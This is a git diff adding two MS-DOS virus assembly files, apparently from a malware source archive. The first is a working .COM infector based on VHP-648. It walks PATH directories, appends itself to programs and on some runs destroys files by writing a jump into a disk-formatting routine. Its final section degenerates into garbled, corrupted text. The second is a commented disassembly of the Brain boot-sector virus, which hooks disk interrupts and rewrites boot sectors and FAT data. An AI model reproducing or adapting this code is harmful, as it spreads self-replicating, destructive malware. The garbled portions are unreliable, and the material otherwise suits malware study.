b/MSDOS/Virus.MSDOS.Unknown.virus3.asm new file mode 100644 index 00000000..2b35cfa8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus3.asm @@ -0,0 +1,309 @@ + name Virus + title Virus; based on the famous VHP-648 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + int 20 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 3 dup (90) ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +codeptr dw ? ;Here is formed a jump to virus code +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file. +;It's a jmp instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,0,0,0,0C8 +errhnd dd ? + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov [si+dtaaddr-data],bx ;Save it in dtaaddr + mov [si+dtaaddr+2-data],es + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + mov [si+errhnd-data],bx + mov [si+errhnd+2-data],es + pop es ;Restore ES + + mov ax,2524 ;Set interrupt 24h handler + mov dx,si + add dx,handler-data + int 21 + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + xor di,di +n_00015A: ;Search 'PATH' in environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+poffs-data],di ;Save 'PATH' offset in poffs + mov bx,si ;Point BX at data area + add si,fname-data ;Point SI & DI at fname + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+poffs-data],6C + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+poffs-data] + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + xor si,si +n_0001B0: + pop bx + pop ds + mov [bx+poffs-data],si + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+eqoffs-data],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cl,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cl,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+time-data] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + +;Is file size greather than 64,000 bytes? + + cmp [si+fsize-data],64000d + ja findnext ;If so, search for next file + +;Is file size less than 10 bytes? + + cmp word ptr [si+fsize-data],10d + jb findnext ;If so, search for next file + + mov di,[si+eqoffs-data] + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+fattrib-data],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + and cl,not 1 ;Turn off Read Only flag + int 21 + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+ftime-data],cx ;Save time in ftime + mov [si+fdate-data],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + jnz n_000266 ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + xor cx,cx ;0 bytes from end + xor dx,dx + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer (file size) + add ax,virus-data-3 ;Add virus data length to get code offset + mov [si+codeptr-data],ax ;Save result in codeptr + inc ch ;Add 100h to CX + mov di,si + add di,modify-data ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,endcode-data ;Virus code length as bytes to be written + mov dx,si ;Write from data to endcode + int 21 + jc oldtime ;Exit on error + cmp ax,endcode-data ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + xor cx,cx ;Just at the file beginning + xor dx,dx + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file ate-dne bove ata area + adttttttt +grrr + +frrrrrrt: + mov ah,4Frrrrrrrrrrre EPpll zDstrrrrrr +e ata area + adttttttt +grrr + g1r1rH)a0x,2524 a0me l eO3Efleqryc+qn_00dd si,d ont 21 + jc oldtime ;Exit on error + cmp me l eO3E*; +conds, more exa mov ahop ssi,d ont 21 G3,n'0exit ;Exit if i bl eO3Efleq n_0001A1: + lods01: + Tn v ax,vitrtvs,pathstrt + rp +tore SI +ff to enaMvall byly ont 21 + jc ?i eO3js + +mar it vall bylit vall tfll etan +rE ax,[di+poffs-datat +conds,lodsblit )Eo +:b; eO3Eeax ;Get the value of file pointer (f + +mar file + xor'artvs,papoinre to file hand ;n written? + jenaMoS wi,edO3E*;cog1ll byly ont 2ijc oltfll etan +rnax,4CSave 'n,X cs,papa tss a font ah,4E ,Nt5h +enaMoS wta 'p ax,c olhem in Kpto file hand ;n writc file +;o dleptrle han yc+qnlile + xor'artvsd ;nCcfont n v ae od + mo ldfile +le hh znt S wi, d +rt2 \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus32a.asm b/MSDOS/Virus.MSDOS.Unknown.virus32a.asm new file mode 100644 index 00000000..90f4eac6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus32a.asm @@ -0,0 +1,1275 @@ +The following is a disassembled and commented version of the Pakistani Brain +virus - segment one. All comments, structure inclusions and explanatory +information is copyright InterPath Corporation, 1987, 1988. This document may +not be distributed or copied without the express written consent of InterPath +Corporation. Contact InterPath at 408 988 3832. + + PAGE 64,132 +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CODE SEGMENT PUBLIC 'CODE' ; + ASSUME CS:CODE,DS:CODE,ES:CODE,SS:NOTHING + ; + ORG 0 ; + ; +BPB EQU 3+8 ;JMP + OEM_NAME + ; +;-----------------------------------------------------------------------; +; COPY OF BOOT SECTOR ; +;-----------------------------------------------------------------------; + ; + DB 6 DUP (?) ; + ; +L0006 DB ? ;HEAD +L0007 DB ? ;SECTOR +L0008 DB ? ;TRACK + ; +L0009 DB ? ;HEAD +L000A DB ? ;SECTOR +L000B DB ? ;TRACK + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + ; + ORG 512 ; + ; +;-----------------------------------------------------------------------; +; (BOOT SECTOR TYPE FORMAT!) ; +;-----------------------------------------------------------------------; +CONTINUE: JMP CONTINUE_2 ;023C + ; +L0203 DB 'IBM X3.2' ;OEM NAME AND VERSION + ; + DW 512 ;BYTES PER SECTOR + DB 2 ;SECTORS PER ALLOCATION UNIT + DW 1 ;RESERVED SECTORS +L0210 DB 2 ;NUMBER OF FATS + DW 112 ;NUMBER OF ROOT DIR ENTRIES + DW 2D0H ;SECTORS PER DISK + DB 0FDH ;MEDIA ID + DW 2 ;SECTORS PER FAT + DW 9 ;SECTORS PER TRACK + DW 2 ;NUMBER OF HEADS + DW 0 ;HIDDEN SECTORS + ; +;---------------------------------------; + DB 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + + DB 2 +DISK_PARM DB 0DFH,2,25H,2,12H,2AH,0FFH,50H,0F6H,0,2 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +REBOOT: INT 19H ;REBOOT + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE_2: ; + CLI ; + XOR AX,AX ; + MOV ES,AX ;ES=0 + MOV SS,AX ;SS:SP = 0000:7C00 + MOV SP,7C00H ; + MOV DS,AX ; + MOV BX,07C0H ;INITIALIZE DISK POINTER (INT 1E) + MOV Word Ptr [78H],2FH ;0000:0078 = (DWORD) 07C0:002F + MOV [7AH],BX ; + ; + MOV DS,BX ;DS = 07C0 + MOV DX,[1EH] ;GET DRIVE/HEAD ;BOOT:001E ! + MOV [20H],DL ;SAVE DRIVE ;BOOT:0020 ! + INT 13H ;RESET + JNB C_10 ; + JMP ERROR_2 ;IF ERROR...'BOOT FAILURE' + ; +C_10: MOV SI,BPB ;SI = BPB ;BOOT:000B + MOV CX,[SI] ;CX = BYTES PER SECTOR + SHR CH,1 ;WORDS PER SECTOR + XCHG CH,CL ; + MOV [2BH],CX ;SAVE ;BOOT:002B + MOV AL,[SI+5] ;AL= NUMBER OF FATS ;BOOT:0010 + XOR AH,AH ; + MUL Word Ptr [SI+0BH] ;TOTAL FAT SECTORS ;BOOT:0016 + ADD AX,[SI+3] ;+RESERVED SECTORS ;BOOT:000E + ADD AX,[SI+11H] ;+HIDDEN SECTORS ;BOOT:001C + MOV [24H],AX ;SAVE IT ;BOOT:0024 + MOV BX,7E00H ; + CALL UI ; + ; + MOV BX,ES ;SAVE ES + MOV AX,70H ;ES=0070H + MOV ES,AX ; + MOV AX,32 ;32* + MUL Word Ptr [SI+6] ; ROOT DIR ENTRIES+ + MOV CX,[SI] ; + ADD AX,CX ; BYTES/SECTOR + DEC AX ; -1 + DIV CX ; /BYTES/SECTOR + ADD [24H],AX ;ADD TO BYTES IN BOOT & FAT + ; + MOV CL,[2AH] ; + MOV AX,[24H] ; + CALL READ_CLUSTER ;(READ BOOT SECTOR ???) + ; + PUSH ES ; + POP DS ; + JMP 0070H:0000H ;(PASS CONTROL TO ???) + ; +;-----------------------------------------------------------------------; +; HEAVY CRUNCHING HERE (CLUSTER READS ?!?!?!) ; +; ON ENTRY: AX = ? +; ES:BX = DTA ; +; CL = ? ; +; DS:SI = BPB ; +; DS:[0021] = ; +;-----------------------------------------------------------------------; +READ_CLUSTER: ;02B3 + PUSH BX ; + PUSH AX ; + ; + MOV AL,CL ; + MUL Byte Ptr [2BH] ; + MOV [29H],AL ; + POP AX ; + MUL Word Ptr [2BH] ; + DIV Word Ptr [SI+0DH] ;(BPB.SECTORS PER TRACK) + INC DL ; + MOV [28H],DL ; + PUSH DX ; + XOR DX,DX ; + DIV Word Ptr [SI+0FH] ;(BPB.NUMBER OF HEADS) + MOV [21H],DL ; + MOV [26H],AX ; + POP DX ; +RC_10: MOV CL,[29H] ; + ADD DL,CL ; + MOV AX,[SI+0DH] ;(BPB.SECTORS PER TRACK) + INC AX ; + CMP DL,AL ; + JBE RC_20 ; + SUB AL,[28H] ; + MOV CL,AL ; +RC_20: MOV AL,CL ; + MOV DX,[26H] ; + MOV CL,6 ; + SHL DH,CL ; + OR DH,[28H] ; + MOV CX,DX ; + XCHG CH,CL ; + MOV DX,[20H] ; + ; + MOV AH,2 ;READ SECTOR + PUSH AX ; + INT 13H ; + POP AX ; + JB ERROR_2 ;IF ERROR...'BOOT FAILURE' + SUB [29H],AL ; + JBE RC_90 ; + CBW ; + MUL Word Ptr [2DH] ; + ADD BX,AX ; + INC Byte Ptr [21H] ; + MOV DL,[21H] ; + CMP DL,[SI+0FH] ; + MOV DL,1 ; + MOV [28H],DL ; + JB RC_10 ; + MOV Byte Ptr [21H],0 ; + INC Word Ptr [26H] ; + JMP RC_10 ; + ; +RC_90: POP BX ; + RET ; + ; +;-----------------------------------------------------------------------; +; PRINT BOOT ERROR MESSAGE AND WAIT FOR A KEY ; +;-----------------------------------------------------------------------; +ERROR_1: ;0339 + MOV SI,01B3H ;'Non-System disk' + JMP E_10 ; + ; +;---------------------------------------; +ERROR_2: ; + MOV SI,01C5H ;'BOOT failure' +E_10: CALL DISPLAY_STRING ; + ; + MOV SI,01D4H ;'Replace and press any key when ready' + CALL DISPLAY_STRING ; + ; + MOV AH,0 ;WAIT FOR A KEY + INT 16H ; +E_20: MOV AH,1 ; THROW IT AWAY AND + INT 16H ; WAIT FOR ANOTHER ONE BUT + JNZ E_20 ; DONT GET IT + JMP REBOOT ; + ; +;-----------------------------------------------------------------------; +; DISPLAY ASCIIZ STRING ; +; ON ENTRY: DS:SI = ASCIIZ STRING ; +;-----------------------------------------------------------------------; +DISPLAY_STRING: ;0357 +DS_00: LODSB ;DISPLAY UNTIL NULL + OR AL,AL ; + JZ DS_90 ; + MOV AH,0EH ; + MOV BX,7 ; + INT 10 ; + JMP DS_00 ; +DS_90: RET ;0365 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +UI: ;0366: + MOV CL,01 ; + CALL READ_CLUSTER ; + ; + PUSH SI ; + MOV DI,BX ; + MOV AX,ES:[BX+1C] ; + XOR DX,DX ; + DIV Word Ptr [SI] ; + INC AL ; + MOV [002A],AL ; + MOV SI,019D ; + MOV CX,000B ; + REPZ ; + CMPSB ; + JNZ ERROR_1 ;'NON SYSTEM DISK' + MOV AX,ES:[BX+3A] ; + MOV [0022],AX ; + MOV DI,BX ; + ADD DI,+20 ; + MOV SI,01A8 ; + MOV CX,000B ; + REPZ ; + CMPSB ; + JNZ ERROR_1 ;'NON SYSTEM DISK' + POP SI ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L039D DB 'IBMBIO COM' + DB 'IBMDOS COM' + DB CR,LF,'Non-System disk',0 + DB CR,LF,'BOOT failure',0 + DB CR,LF,'Replace and press any key when ready',0 + DB 90H,90H,90H,55H,0AAH + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L0400: JMP SHORT CONT_A ; + ; + DB '(c) 1986 Basit & Amjads (pvt) Ltd ',0 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONT_A: ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L0A5B DB 'IBMBIO COM' + DB 'IBMDOS COM' + DB CR,LF,'Non-System disk',0 + DB CR,LF,'BOOT failure',0 + DB CR,LF,'Replace and press any key when ready',0 + DB 90H,90H,90H,55H,0AAH + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + ADD AL,00 ;0425 0400 + ADD [06C6],CH ;0427 002EC606 + AND AX,1F02 ;042B 25021F + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +REDIRECT_13: ;042E + XOR AX,AX ;GET INT 13 VECTOR + MOV DS,AX ; + MOV AX,[004CH] ; + MOV [01B4H],AX ; (SAVE IT TO INT 6D VECTOR) + MOV AX,[004EH] ; + MOV [01B6H],AX ; + MOV AX,0276H ;SET INT 13 VECTOR + MOV [004CH],AX ; + MOV AX,CS ; + MOV [004EH],AX ; + ; + MOV CX,0004 ;RETRY = 4 + XOR AX,AX ; + MOV ES,AX ; +L0450: PUSH CX ; + MOV DH,CS:[0006] ;DH = HEAD + MOV DL,00 ;DRIVE A: + MOV CX,CS:[0007] ;CX = TRACK/SECTOR + MOV AX,0201 ;READ 1 SECTOR + MOV BX,7C00 ;ES:BX == DTA = 0000:7C00 + INT 6DH ; + JNB L0470 ; + MOV AH,00 ;RESET + INT 6DH ; + POP CX ;TRY AGAIN + LOOP L0450 ; + INT 18H ;LOAD BASIC + ; +L0470: JMP 0000:7C00 ;JUMP TO BOOT LOADER ?!?! + ; + NOP ;0475 90 + STI ;0476 FB + CMP AH,02 ;0477 80FC02 + JNZ L0494 ;047A 7518 + CMP DL,02 ;047C 80FA02 + JA L0494 ;047F 7713 + CMP CH,00 ;0481 80FD00 + JNZ L048B ;0484 7505 + CMP DH,00 ;0486 80FE00 + JZ L0497 ;0489 740C +L048B: DEC Byte Ptr CS:[0225] ;048B 2EFE0E2502 + JNZ L0494 ;0490 7502 + JMP L0497 ;0492 EB03 +L0494: JMP L053C ;0494 E9A500 +L0497: MOV Byte Ptr CS:[0227],00 ;0497 2EC606270200 + MOV Byte Ptr CS:[0225],04 ;049D 2EC606250204 + PUSH AX ;04A3 50 + PUSH BX ;04A4 53 + PUSH CX ;04A5 51 + PUSH DX ;04A6 52 + MOV CS:[0226],DL ;04A7 2E88162602 + MOV CX,0004 ;04AC B90400 + PUSH CX ;04AF 51 + MOV AH,00 ;04B0 B400 + INT 6D ;04B2 CD6D + JB ;04CB ;04B4 7215 + MOV DH,00 ;04B6 B600 + MOV CX,0001 ;04B8 B90100 + MOV BX,06BE ;04BB BBBE06 + PUSH ES ;04BE 06 + MOV AX,CS ;04BF 8CC8 + MOV ES,AX ;04C1 8EC0 + MOV AX,0201 ;04C3 B80102 + INT 6D ;04C6 CD6D + POP ES ;04C8 07 + JNB ;04D1 ;04C9 7306 + POP CX ;04CB 59 + LOOP ;04AF ;04CC E2E1 + JMP ;04FF ;04CE EB2F + NOP ;04D0 90 + POP CX ;04D1 59 + MOV AX,CS:[06C2] ;04D2 2EA1C206 + CMP AX,1234 ;04D6 3D3412 + JNZ ;04E3 ;04D9 7508 + MOV Byte Ptr CS:[0227],01 ;04DB 2EC606270201 + JMP ;0503 ;04E1 EB20 + PUSH DS ;04E3 1E + PUSH ES ;04E4 06 + MOV AX,CS ;04E5 8CC8 + MOV DS,AX ;04E7 8ED8 + MOV ES,AX ;04E9 8EC0 + PUSH SI ;04EB 56 + CALL L0804 ;04EC E81503 + JB ;04FA ;04EF 7209 + MOV Byte Ptr CS:[0227],02 ;04F1 2EC606270202 + CALL L06B2 ;04F7 E8B801 + POP SI ;04FA 5E + POP ES ;04FB 07 + POP DS ;04FC 1F + JNB ;0503 ;04FD 7304 + MOV AH,00 ;04FF B400 + INT 6D ;0501 CD6D + POP DX ;0503 5A + POP CX ;0504 59 + POP BX ;0505 5B + POP AX ;0506 58 + CMP CX,+01 ;0507 83F901 + JNZ L053C ;050A 7530 + CMP DH,00 ;050C 80FE00 + JNZ L053C ;050F 752B + CMP Byte Ptr CS:[0227],01 ;0511 2E803E270201 + JNZ ;052A ;0517 7511 + MOV CX,CS:[06C5] ;0519 2E8B0EC506 + MOV DX,CS:[06C3] ;051E 2E8B16C306 + MOV DL,CS:[0226] ;0523 2E8A162602 + JMP L053C ;0528 EB12 + CMP Byte Ptr CS:[0227],02 ;052A 2E803E270202 + JNZ L053C ;0530 750A + ; + MOV CX,CS:[0007] ;CX = TRACK/SECTOR + MOV DH,CS:[0006] ;DH = HEAD +L053C: INT 6DH ; + RETF 2 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L0541 DB 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L0550: JMP CONTINUE_3 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L0553 DW 3 ; + DB ' (c) 1986 Basit & Amjads (pvt) Ltd' + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE_3: ;0577 + CALL READ_VERIFY ;READ VERIFY + MOV AX,[06BEH] ;IF ??? == DOUBLD SIDED 9 SECTORS... + CMP AX,0FFFDH ; + JE L0586 ;...CONTINUE + MOV AL,3 ;ELSE RETURN ??? ERROR + STC ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +L0586: ;0586 + MOV CX,0037 ; + MOV Word Ptr [0353],0000 ; + CALL ;05F8 ;058F E86600 + CMP AX,0000 ;0592 3D0000 + JNZ ;05A5 ;0595 750E + INC Word Ptr [0353] ;0597 FF065303 + CMP Word Ptr [0353],+03 ;059B 833E530303 + JNZ ;05AB ;05A0 7509 + JMP ;05B6 ;05A2 EB12 + NOP ;05A4 90 + MOV Word Ptr [0353],0000 ;05A5 C70653030000 + INC CX ;05AB 41 + CMP CX,0163 ;05AC 81F96301 + JNZ ;058F ;05B0 75DD + MOV AL,01 ;05B2 B001 + STC ;05B4 F9 + RET ;05B5 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + MOV DL,03 ;05B6 B203 + CALL ;05CB ;05B8 E81000 + DEC CX ;05BB 49 + DEC DL ;05BC FECA + JNZ ;05B8 ;05BE 75F8 + INC CX ;05C0 41 + CALL CONVERT_1 ;CLUSTER TO TRACK/SECTOR/HEAD + CALL ;062D ;05C4 E86600 + MOV AL,00 ;05C7 B000 + CLC ;05C9 F8 + RET ;05CA C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + PUSH CX ;05CB 51 + PUSH DX ;05CC 52 + MOV SI,06BE ;05CD BEBE06 + MOV AL,CL ;05D0 8AC1 + SHR AL,1 ;05D2 D0E8 + JB ;05E4 ;05D4 720E + CALL FUNCTION_1 ;BX = (CX*3)/2 + MOV AX,[BX+SI] ;05D9 8B00 + AND AX,F000 ;05DB 2500F0 + OR AX,0FF7 ;05DE 0DF70F + JMP ;05EF ;05E1 EB0C + NOP ;05E3 90 + CALL FUNCTION_1 ;BX = (CX*3)/2 + MOV AX,[BX+SI] ;05E7 8B00 + AND AX,000F ;05E9 250F00 + OR AX,FF70 ;05EC 0D70FF + MOV [BX+SI],AX ;05EF 8900 + MOV [BX+SI+0400],AX ;05F1 89800004 + POP DX ;05F5 5A + POP CX ;05F6 59 + RET ;05F7 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + PUSH CX ;05F8 51 + MOV SI,06BE ;05F9 BEBE06 + MOV AL,CL ;05FC 8AC1 + SHR AL,1 ;05FE D0E8 + JB L060D ;0600 720B + CALL FUNCTION_1 ;BX = (CX*3)/2 + MOV AX,[BX+SI] ;0605 8B00 + AND AX,0FFF ;0607 25FF0F + JMP L0619 ;060A EB0D + ; +L060D: CALL FUNCTION_1 ;BX = (CX*3)/2 + MOV AX,[BX+SI] ;0610 8B00 + AND AX,FFF0 ;0612 25F0FF + MOV CL,04 ;0615 B104 + SHR AX,CL ;0617 D3E8 +L0619: POP CX ;0619 59 + RET ;061A C3 + ; +;-----------------------------------------------------------------------; +; BX = (CX*3)/2 ; +;-----------------------------------------------------------------------; +FUNCTION_1: ;061B + PUSH DX ; + MOV AX,3 ; + MUL CX ; + SHR AX,1 ; + MOV BX,AX ; + POP DX ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +READ_VERIFY: ;0627 + MOV AH,2 ; + CALL VERIFY_SECTORS ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +WRITE_VERIFY: ;062D + MOV AH,03 ; + CALL VERIFY_SECTORS ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +VERIFY_SECTORS: ;0633 + MOV CX,4 ;RETRY = 4 +L0636: PUSH CX ; + PUSH AX ; + MOV AH,0 ;REST + INT 6DH ; + POP AX ; + JB L0653 ; + MOV BX,offset L06BEH ; + MOV AL,4 ;4==VERIFY + MOV DH,00 ;HEAD 0 + MOV DL,[0226] ;DRIVE DL + MOV CX,0002 ;TRACK 0/SECTOR 2 + PUSH AX ; + INT 6DH ; + POP AX ; + JNB L065C ;IF ERROR...EXIT +L0653: POP CX ; + LOOP L0636 ;RETRY + POP AX ; + POP AX ; + MOV AL,2 ;BAD ADDRESS MARK ??? + STC ;RETURN ERROR + RET ; + ; +L065C: POP CX ; + RET ; + ; +;-----------------------------------------------------------------------; +; CONVERT CLUSTERS TO TRACK/SECTOR/HEAD ???? ; +;-----------------------------------------------------------------------; +CONVERT_1: ;065E + PUSH CX ; + SUB CX,2 ; + SHL CX,1 ;WORD PTR + ADD CX,9*2 ; (SECTORS PER CYLINDER ???) + MOV AX,CX ; + MOV CL,9*2 ; (SECTORS PER CYLINDER ???) + DIV CL ; + MOV DS:[0008],AL ;AL = TRACK + MOV Byte Ptr DS:[0006],0 ;INC. HEAD + INC AH ;INC. SECTOR + CMP AH,9 ;IF TOO BIG... + JBE L0684 ; + SUB AH,9 ;...START AT ZERO + MOV Byte Ptr DS:[0006],1 ;INC. HEAD +L0684: MOV DS:[0007],AH ; + POP CX ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + ADD [BX+SI],AL ;068A 0000 + ADD [BX+SI],AL ;068C 0000 + ADD [BX+SI],AL ;068E 0000 + ADD BP,[SI+00] ;0690 036C00 + ADD AX,[BP+DI] ;0693 0303 + MOV SI,010E ;0695 BE0E01 + ADD [BX+SI],AL ;0698 0000 + ADD AX,SP ;069A 01E0 + FCOMP DWord Ptr [DI+E0D7] ;069C D89DD7E0 + LAHF ;06A0 9F + LEA BX,[BX+SI+8E9F] ;06A1 8D989F8E + LOOPNZ ;06C7 ;06A5 E020 + SUB [BP+DI+29],AH ;06A7 286329 + AND [BP+SI+72],AL ;06AA 204272 + POPA ;06AD 61 + IMUL BP,[BP+20],E824 ;06AE 696E2024E8 + FILD DWord Ptr [BX+SI] ;06B3 DB00 + JB L06C1 ;06B5 720A + PUSH DI ;06B7 57 + CALL ;06DA ;06B8 E81F00 + POP DI ;06BB 5F + JB L06C1 ;06BC 7203 + CALL WRITE_RBF ;WRITE ROOT BOOT FAT +L06C1: RET ;06C1 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + MOV BX,049B ;06C2 BB9B04 + MOV CX,000B ; +L06C8: MOV AL,[BX] ; + NEG AL ; + MOV [SI],AL ; + INC SI ; + INC BX ; + LOOP L06C8 ; + ; + MOV AL,08 ; + MOV [SI],AL ; + CLC ; + RET ;06D7 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + MOV Byte Ptr [06C7],91 ;06D8 C606C70691 + ADD AL,6C ;06DD 046C + ADD [BP+06FE],BH ;06DF 00BEFE06 + MOV [0493],DX ;06E3 89169304 + MOV AX,[0491] ;06E7 A19104 + SHR AX,1 ;06EA D1E8 + MOV [0497],AX ;06EC A39704 + SHR AX,1 ;06EF D1E8 + MOV [0495],AX ;06F1 A39504 + XCHG AX,CX ;06F4 91 + AND CL,43 ;06F5 80E143 + MOV DI,[0495] ;06F8 8B3E9504 + ADD DI,01E3 ;06FC 81C7E301 + MOV AL,[SI] ;0700 8A04 + CMP AL,00 ;0702 3C00 + JZ ;071B ;0704 7415 + MOV AL,[SI+0B] ;0706 8A440B + AND AL,08 ;0709 2408 + CMP AL,08 ;070B 3C08 + JZ ;071B ;070D 740C + ADD SI,+20 ;070F 83C620 + DEC Word Ptr [0491] ;0712 FF0E9104 + JNZ ;0700 ;0716 75E8 + STC ;0718 F9 + RET ;0719 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +: ;071A + MOV CX,[BP+DI+331D] ; + PUSH DS ;071E 1E + XCHG AX,DI ;071F 97 + ADD AL,89 ;0720 0489 + XCHG AX,DI ;0722 3697 + ADD AL,FA ;0724 04FA + MOV AX,SS ;0726 8CD0 + MOV SS:[0493],AX ;0728 A39304 + MOV [0495],SP ;072B 89269504 + MOV AX,CS ;072F 8CC8 + MOV SS,AX ;0731 8ED0 + MOV SP,[0497] ;0733 8B269704 + ADD SP,+0C ;0737 83C40C + MOV CL,51 ;073A B151 + ADD DX,444C ;073C 81C24C44 + MOV DI,2555 ;0740 BF5525 + MOV CX,0C03 ;0743 B9030C + REPZ ;0746 F3 + CMPSW ;0747 A7 + MOV AX,0B46 ;0748 B8460B + MOV CX,0003 ;074B B90300 + ROL AX,CL ;074E D3C0 + MOV [0497],AX ;0750 A39704 + MOV CX,0005 ;0753 B90500 + MOV DX,0008 ;0756 BA0800 + SUB Word Ptr [0497],5210 ;0759 812E97041052 + PUSH [0497] ;075F FF369704 +L0763: MOV AH,[BX] ;0763 8A27 + INC BX ;0765 43 + MOV DL,AH ;0766 8AD4 + SHL DL,1 ;0768 D0E2 + JB L0763 ;076A 72F7 +L076C: MOV DL,[BX] 